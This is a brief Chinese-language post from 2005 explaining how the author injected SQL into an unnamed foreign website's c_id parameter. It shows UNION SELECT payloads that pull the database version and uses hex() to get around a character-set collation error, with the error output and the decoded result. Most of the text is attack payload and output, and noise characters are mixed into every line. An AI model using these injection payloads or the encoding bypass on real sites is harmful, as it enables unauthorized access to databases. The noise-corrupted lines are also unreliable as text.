本文作者:SuperHei
5 `# X `6 Q% b' }$ Y6 k文章性质:原创; R$ B- M3 N8 }4 p: {) L
发布日期:2005-10-186 P7 L# i: K9 u
测试个国外的站时:
7 _9 n8 O! v# P9 ?/ [url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*/ D0 e8 R: U' y
返回错误:7 z! g6 ^. X7 v. P8 ?5 C
Illegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'; p+ y) x: U, U( z0 U0 f/ C
MySQL Error No. 126
6 }( m& U4 x. r7 k7 p5 [ J" O看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。
9 B% r9 d3 {' ?# b7 d. N- x6 A& O解决办法:转为其他编码如hex。0 Y5 K a: P, h: Y o
url:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*' P5 S& h5 W0 m) u5 C0 }; h
成功得到hex(version())的值为:
+ W' U0 o7 f8 f0 |3 c2 s342E312E332D62657461" Q7 B1 K* P. J+ Q( ?% D8 u
回Mysql查询下得到:
3 U0 t1 T3 g; Smysql> select 0x342E312E332D62657461;
. r6 [) ?7 O0 u$ [2 z- ?+------------------------+, f1 V% R% }% e
| 0x342E312E332D62657461 |% C# [, M) d# c$ I
+------------------------+9 j" W u! u7 i
| 4.1.3-beta |( `8 A% g# Q) U3 p+ }
+------------------------+$ P, S% x: O/ f: t- R J9 O
1 row in set (0.00 sec)# |- I: E* K- h; F; n7 o/ ?9 q4 F
- I, ~! _9 Y/ Y* S
|